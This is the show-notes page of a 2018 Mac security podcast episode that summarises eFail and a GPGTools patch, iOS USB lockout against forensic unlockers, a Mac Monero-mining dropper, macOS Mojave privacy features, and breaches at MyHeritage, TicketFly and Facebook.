SecureMac, Inc.

The Checklist Podcast

SecureMac presents The Checklist. Each week, Nicholas Raba, Nicholas Ptacek, and Ken Ray hit security topics for your Mac and iOS devices. From getting an old iPhone, iPad, iPod, Mac, and other Apple gear ready to sell to the first steps to take to secure new hardware, each show contains a set of easy to follow steps meant to keep you safe from identity thieves, hackers, malware, and other digital downfalls. Check in each Thursday for a new Checklist!

Checklist 95: Summer Security News

Posted on June 28, 2018

It seems like it was just yesterday that we were kicking off the new year and wondering what the months ahead would have in store for us. As we head into the first sweltering days of summer, it’s safe to say that the first half of the year has been jam-packed with bigger and more far-reaching stories than even we could have anticipated. With so much going on, it can be tough to keep up with all the headlines coming your way. Luckily, we have your back — we’ve got the details on five of the stories you should know about right here in this week’s discussion. Let’s not waste any more time and jump right in to this week’s topics.

On our list today:

  • A follow-up on eFail and Apple Mail
  • Apple changes the game for iOS forensics
  • More Mac cryptomining malware appears
  • MacOS Mojave brings major improvements to security & privacy
  • Another month, another leak — or two, or three…

Let’s start things off be revisiting the topic of encrypted email.

A follow-up on eFail and Apple Mail

Just a few weeks ago, back in Episode 93 of The Checklist, we discussed a flaw that had just been discovered in the encryption protocol most commonly used to send emails privately and securely, PGP. You can read up on the full details of the flaw and the attack methods, dubbed eFail, in that episode’s show notes. As a quick refresher, the flaw works when an attacker exploits the way emails load HTML content that requires content from a web server, or when other external media is embedded into an email. Through this exploit, the attacker can ultimately gain a plain text version of the email they want to intercept.

At the time we recorded the last episode, the best advice we had at the time to mitigate the risk of running into the bug was to disable the setting in your mail client that allows it to load remote content. Then, we suggested, it was time to sit and wait — we’d need to hear from the PGP developers themselves as they worked to identify a solution. Well, as it turns out, that advice worked in some ways, but not if you were using a particular PGP plugin with the Apple Mail client built into macOS.

Called GPGTools, this plugin lets you send encrypted email quickly and easily from within Apple Mail without the need to muck with a huge number of settings or to use special procedures for every message. While the GPGTools developers said remote loading was the key to exploiting eFail in their plugin, that seems to have been a little short-sighted. After programmers and others spread the word that remote content loading was better off disabled and would render the attack ineffective, a security researcher by the name of Micah Lee discovered that wasn’t always true.

With some effort, he was able to develop a “proof of concept” exploit that allowed eFail to work in Apple Mail even with remote content loading turned off entirely. Though he did not release specific details on the attack because there was no patch yet, he quickly sent his results to GPGTools to alert them of the danger. Unfortunately, this news was not as widely reported as the initial eFail announcement. Many users continue to believe that they’re completely safe again with remote content loading turned off, but this is not strictly true. Though the recommendations given out were the best possible with the information available at the time, circumstances quickly changed — as they often do in the security world.

There is good news at the end of this story, though. As of June 4th, GPGTools has issued a patch to fix the eFail exploit rather than simply using a mitigation strategy. If you use GPGTools to encrypt your email in Apple Mail, it’s time to update! Look for Suite 2018.2 and upgrade as soon as possible if you haven’t done so yet. Otherwise, you run the risk of remaining vulnerable to hackers with prying eyes.

Apple changes the game for iOS forensics

Here’s another important update to a story we covered recently. This time, we’re talking about something we mentioned back in Episode 88 of The Checklist wherein Apple had made a strange and interesting modification to iOS in the name of security. If your iOS device went a full seven days without being unlocked by either your fingerprint, your face ID, or your password, then access to the phone’s data through the Lightning port would be disabled. The only way to get back into the phone at that point would be a legitimate, authorized user authenticating themselves.

At the time, it was clear that this was related to the “unlocker” devices being sold to law enforcement and other sources by companies such as GrayShift and Cellebrite. GrayShift’s GrayKey especially has concerned Apple, because it appears to attack the iOS bootloader to bypass system security to load a brute force attack that finds the user’s passcode. By disabling the Lightning port after seven days, the reasoning went, law enforcement would have a limited window in which to get to your device.

However, we also thought at the time that seven days was far too long a period to employ in a real-world situation. After all, if law enforcement got their hands on your device and they already had a GrayKey installed at the police department, it wouldn’t take seven days for them to go and plug it in to get at your data. The good news: it looks like the original week-long window was just a proof of concept Apple was using to test the waters. Either that or it was a move designed to deflect attention from their other efforts to solve the problems posed by these unlocker devices.

Now, with both the iOS 11.12 and iOS 11.4.1 beta versions, that period has been shortened considerably. Apple has taken the fight against these hardware exploits seriously. Now, the hardware port will always be disabled within just one hour after the last authenticated unlock of the device. Users should see no real impact from this change, as iOS already asks for your passcode anyway when you plug a device into a computer (unless, of course, you’ve already trusted the machine). It means that while Apple may not be able to fix the basic flaw at work in GrayShift devices, they can slam the door shut in another way.

We’ll keep an eye on this story as it develops. It will be interesting to see how Cellebrite and GrayShift respond to this change — if they can at all. If they’re unable to find a new way to get past this barrier in iOS, they’re going to have a lot of unhappy law enforcement customers. They’ll also have a tough time attracting any new business! Concerned users should be able to rest easier knowing that unauthorized access to their phone is now harder to obtain than ever.

More Mac cryptomining malware appears

Cryptominers? On your Mac? It could happen — at least, that’s increasingly what we’ve been seeing occur over these past few months. In Episode 82 of the Checklist, we discussed how a calendar app with a built-in cryptocurrency miner had managed to squeak past Apple’s review procedures. The app did this by offering some extra features in exchange for giving over your CPU cycles to mine cryptocoins for the app developers. How it made it past Apple the first time isn’t quite clear, but once the news broke, there was a serious backlash against the developers — and of course, negative PR for the App Store, too. Apple quickly revoked the app’s permissions and required the developers to remove the offending features.

While that’s a good example of a strong public outcry at work, malware authors don’t care how much you complain. They aren’t facing mobs of angry App Store customers, and generally, no one even knows who they are. So, what’s it to them if your computer runs slow if it means they can accumulate digital wealth on the down-low? That’s the case with a new type of malware recently discovered running a Mac and using tons of your Mac’s resources to mine crypto.

Discovered in late May, it has flown under the radar for an unknown amount of time. The only reason it even came to light is because a user posted on the official Apple forums asking for help diagnosing performance problems with his computer. He asked why a process he identified, called “mshelper,” was using up so much of his CPU’s available resources. It was taxing his machine to the point where he could not get much else done. As it turns out after an investigation by some researchers, mshelper is a package designed to hide a miner generating the cryptocurrency known as Monero.

There was nothing particularly special or sneaky about this malware, though — it wasn’t even very well designed. Rather than running custom code and trying to hide its operations better, or to vary the intensity of its mining efforts to avoid detection, it was just a basic “dropper.” Once infected, the dropper would install XMRig, a legitimate and official piece of software for mining Monero. Normally, users would install XMRig voluntarily, but in this case, the malware authors wanted to steal CPU resources to mine coins for themselves.

Where did the user pick up this piece of malware? That is something we don’t yet know. However, it doesn’t appear that infections are widespread as not many others have reported encountering mshelper. Nonetheless, not only does this showcase the fact that random malware infections are on the rise on Macs, but it shows that cryptominers are a growing problem for Mac users. Like with every other security threat, it’s important to wake up to the fact that it’s here on our Macs right now!

MacOS Mojave brings major improvements to security & privacy

That’s enough doom and gloom for right now — what about some good news for a change? Apple’s got some of that in the pipeline for macOS users, and we’re excited about the upcoming changes. Each June, Apple hosts its world-famous gathering known as the Worldwide Developers Conference. WWDC is an opportunity for Apple to bring Mac-focused developers together in one place to show off their latest hardware and software innovations. These developers typically spend the months following WWDC working hard to bring their apps up to speed regarding compatibility for the new flagship versions of macOS and iOS that typically launch in the fall of the same year.

This year, Apple’s WWDC included some awesome news about improvements the company has made to security and privacy in upcoming releases. The biggest of all these changes will come in the newest version of macOS, called Mojave. macOS Mojave will replace High Sierra and brings with it some much-needed additions.

For example, Mojave will now explicitly ask for your permission before any app can be allowed to access locations on your machine that could include sensitive personal data. Such locations would include Contacts, Photo, Calendar, Location, Reminders, Message Histories, Mail Databases, Safari-linked data,

iTunes device backups, Time Machine Backups, and System cookies

That’s a lot of data — and these new permission requests are a great way to ensure that no app is ever rooting around in your personal files without your knowledge. However, these protections aren’t limited only to data. The new security will also ask for your permission before an app can access your camera or microphone, tipping you off to anything that might try to record you surreptitiously.

FaceTime is getting a face-lift and will now be able to support up to 32 different devices in the same conversation. While that opens possibilities for huge video conference calls, it also comes with a much-needed security boost: end-to-end encryption. While this level of encryption is already available as standard for voice calls and single FaceTime calls; this will extend protection to everyone involved in the group chat.

Mojave will also include new improvements to the iCloud KeyChain. Remember how often we talk about not reusing the same password for different accounts? Keychain will now warn you if you try to reuse a password that you’ve used for another account. Now is a good time to invest in a password manager and remove the need to remember complicated and different passwords altogether. It’s easier and safer!

What about web browsing? Recent versions of macOS brought us improvements in Safari’s privacy by placing a limit on how much time a third-party tracking cookie will work before the system quarantines it altogether. Mojave is ramping up protections for Safari, and we can only say “Good!”

Fingerprinting, a method used by online advertisers to identify users based on the device and browser you’re using to surf the web, is just as concerning these days as tracking cookies. Even if you’re blocking cookies, fingerprinting still works by asking your browser to return information such as your screen resolution, OS version, extensions you use, and more. All this can add up to a unique identifier for your device. Now, Safari will refuse to transmit this information to advertisers. More than that, Safari will try to create a homogenized vision to advertisers. In other words, every Mac should look the same when a business tries to fingerprint your browser. Apple is also taking aim at Facebook’s tracking through “Like” and “Share” buttons, limiting their ability to track Safari users.

Now, these features aren’t available to the public just yet. Apple still needs time to finish refining and implementing them. However, macOS Mojave (v. 10.14) is scheduled for release late this fall. Keep an eye out for it, and be ready to upgrade when it finally hits!

Another month, another leak — or two, or three…

In another recent episode, we spent some time talking about how your data isn’t always compromised by a malicious hack that attacks those who hold our info. Sometimes their own mistakes lead to a problem that leaks the data onto the open Internet or leaves it in a place where a malicious party could find it. Well, the plumber we called for still hasn’t shown up — we have three more big leak stories to cover this week too.

The first leak we must talk about today comes from MyHeritage, a DNA testing service that also hosts genealogy tools. In the latter department, MyHeritage allows users to “explore the lives” of their ancestors and to “discover their family’s history.” Their DNA service has the tagline: “Uncover your ethnic origins and find new relatives with our simple DNA test.” We’ve discussed some of the strange and creepy ramifications of these services on The Checklist before, but that’s not exactly what we’re focusing on here today.

Obviously, though, both aspects of this business model require users to hand over a large amount of personal information if they want to be able to find long-lost relatives. With such a large amount of sensitive data in play, one would assume that they would also take precautions to protect all that information from unwanted intruders. Right?

Well, apparently no. According to a recent blog post made on the MyHeritage site, the company received a notification from a researcher on June 4th that he had found an archive file named “MyHeritage” on a private server outside of the company’s control. Inside this archive were the email addresses and hashed passwords for nearly 100 million MyHeritage users — that represents every single user who had signed up for the service all the way up to the day the data breach apparently took place in October of 2017.

The fact that the passwords were hashed is good news; it looks like MyHeritage uses a strong hashing algorithm, so it will not be easy or feasible for the bad guys to break into the passwords. However, by the time MyHeritage made their post, how the hackers compromised their servers was still an unknown. If you’ve used this site or their service, change your password — and change your passwords everywhere else you may have used the same one, too. While not a major disaster, it’s troubling that a site with so much sensitive info did not detect such a major breach for so long.

Next up: a company called TicketFly. Like TicketMaster but far smaller, TicketFly sells admission to shows that take place in smaller, independent venues. They, too, recently had some run-ins with computer security problems. On May 31st, the company had to take down their entire website after a hacker broke in and defaced the site. The digital graffiti left behind by the hacker: “Your security down, I’m not sorry. Next time I will publish database.”

According to the hacker, they had notified TicketFly time and time again of the flaw they used to break in to the site, only to be ignored. After making no headway, they took a more aggressive “black hat” style route to solving the problem. TicketFly’s site went down for nearly a full week. By the time the company had something new to say, it wasn’t anything good. They confirmed users’ worst fears: nearly 27 million user accounts on the site had been compromised by the hacker—which included information such as names, addresses, emails, and phone numbers.

The hacker even went so far as to post some of that data publicly on the TicketFly website before its removal from the Internet. While the company says that no credit card information was accessed or stolen, this brazen attack both highlights the need for paying attention to security warnings and for stronger protections in the first place.

Finally: Facebook. Is it any surprise that we’re talking about them again? However, today’s story is a bit different from the previous two data leaks we’ve covered already. Instead of a hacker making off with personal info, this one involves users posting the information themselves.

Consider the way Facebook normally works: a user makes a post and chooses an “audience” to target that post to on the site. You could choose to post something publicly for anyone in the world to see, but most of the time, people set their audience to “friends only” or even “private” if they only want to be able to see it themselves. That’s the way it’s supposed to work, but recently, the entire system broke down. A bug on Facebook’s servers made it so that when users thought they were posting to their friends only audience, the posts were being blasted out to the entire world as a public post.

The bug was live and in effect for more than a week in May, and Facebook says they believe it affected about 14 million users in total. Users may not have known that they were posting publicly, especially because once you change the audience setting, it remains that way until you change it back. Facebook says it has started to notify users who were affected by the bug. If you were involved, Facebook will let you know, telling you to review the audience set for your recent posts. Considering how seriously some take these settings, this is a big bug! It’s hard to believe it was live for a full ten days — but at least, Facebook says, it’s now fixed.

While we can’t expect data leaks ever fully to stop, we can hope that the more these stories make the news, the bigger companies will see the value in taking stronger precautions and being more proactive to safeguard user information. Most likely, though, we’ll have plenty more to discuss in these areas over the coming months.

With that, we can conclude our look at the state of security news for the start of the summer. From data leaks to a trip to the Mojave, a lot is going on — but it doesn’t have to be tough to stay on top of things. We’ll keep bringing you the latest updates all summer, and all year, long.

Join our mailing list for the latest security news and deals